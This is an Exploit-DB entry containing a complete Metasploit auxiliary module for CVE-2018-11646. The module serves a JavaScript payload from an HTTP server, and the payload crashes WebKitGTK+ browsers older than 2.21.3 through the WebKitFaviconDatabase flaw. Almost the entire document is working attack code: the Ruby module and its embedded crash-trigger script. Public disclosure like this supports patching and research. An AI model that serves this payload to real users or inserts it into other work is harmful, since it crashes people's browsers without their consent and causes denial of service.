WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' Denial of Service (Metasploit)

EDB-ID:

44876




Platform:

Linux

Date:

2018-06-11


##
# Title: WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS
# Author: Dhiraj Mishra
# Date: 2018-06-11
# CVE: 2018-11646
#
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => "WebKitGTK+ WebKitFaviconDatabase DoS",
        'Description'    => %q(
          This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.
          If successful, it could lead to application crash, resulting in denial of service.
        ),
        'License'        => MSF_LICENSE,
        'Author'         => [
          'Dhiraj Mishra', # Original discovery, disclosure
          'Hardik Mehta',  # Original discovery, disclosure
          'Zubin Devnani', # Original discovery, disclosure
          'Manuel Caballero' #JS Code
        ],
        'References' => [
          ['EDB', '44842'],
          ['CVE', '2018-11646'],
          ['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],
          ['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']
        ],
        'DisclosureDate' => 'Jun 03 2018',
        'Actions'        => [[ 'WebServer' ]],
        'PassiveActions' => [ 'WebServer' ],
        'DefaultAction'  => 'WebServer'
      )
    )
  end

  def run
    exploit # start http server
  end

  def setup
    @html = <<-JS
<script type="text/javascript">
 win = window.open("WIN", "WIN");
 window.open("http://example.com/", "WIN");
 win.document.execCommand('stop');
 win.document.write("HelloWorld");
 win.document.close();
</script>
    JS
  end

  def on_request_uri(cli, _request)
    print_status('Sending response')
    send_response(cli, @html)
  end
end